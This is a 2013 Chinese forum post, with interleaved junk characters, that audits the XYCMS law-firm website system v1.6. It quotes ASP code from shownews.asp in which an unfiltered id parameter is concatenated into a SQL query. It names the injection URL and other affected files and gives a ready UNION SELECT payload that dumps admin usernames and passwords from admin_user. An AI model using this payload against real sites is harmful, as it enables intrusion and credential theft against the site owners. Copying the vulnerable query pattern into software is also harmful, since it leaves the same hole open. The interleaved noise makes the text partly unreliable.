前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
6 d( T2 D( Z8 _8 B# J. B Z3 | X) a" _& r+ {, ^0 Q8 F. U
淫荡分割线
% U$ j% u" L3 l0 S--------------------------------------------------------2 {2 ?* U+ c9 u1 K' L. ?3 ~
; _$ M+ s5 f0 p1 ?
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
6 P! P% {8 J( |& `" |$ G" f2 {源码地址:http://down.chinaz.com/soft/29233.htm; G! X# s6 P: k/ f4 Y( `9 b/ \
; G4 |+ f; |9 [( f
漏洞文件:shownews.asp
* l7 r( P+ w% M! y漏洞代码:7-13行
& P( X2 ]' ~! R* G" ^6 ^
# f: W, g6 k$ e- Z# E4 Y/ I 6 @' e/ T; }# D3 W; f0 R' I
<% : O( w; D& s) ~) w- t' v
id=request.QueryString("id")
0 j9 |; H0 c) m) s" t+ F/ R7 @; x $ l9 |6 e% W# P3 _1 `9 _6 Y" E
set snews=server.createobject("adodb.recordset")
3 ]# A, i- ~1 k$ m! E3 R* `! Cexec="select * from [news] where id="&id
: {4 A7 D5 h4 h1 Osnews.open exec,conn,1,1# f, a! L1 B7 Y4 c* H$ Z
%>; V2 F2 ]. }+ H2 U% V& v- w q
: o' p+ }# r! l2 h C / r; ]1 G7 ]* B$ `+ [
什么过滤都没有 直造成注入
* Z- v" O5 {) \1 l/ Z* y0 N0 |
3 q0 r& I! W$ T. m# r" E注入点:http://127.0.0.1:99/shownews.asp?id=xx# V' n4 B( T2 t9 o. }
# x2 o( h2 D/ r$ O2 X4 }其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
( T- M) g+ {# J9 X8 O! L: L" \- ` c
K: }9 k- J0 U: S; x1 L! R ( V m: E+ [7 X+ `
exp: union select 1,admin,password,4,5,7 from admin_user! h, ]+ n5 o2 Y* v: y! e
: v9 I8 ]) ~4 u6 O/ V |
发表于 2013-4-4 17:28:12
收藏
支持
反对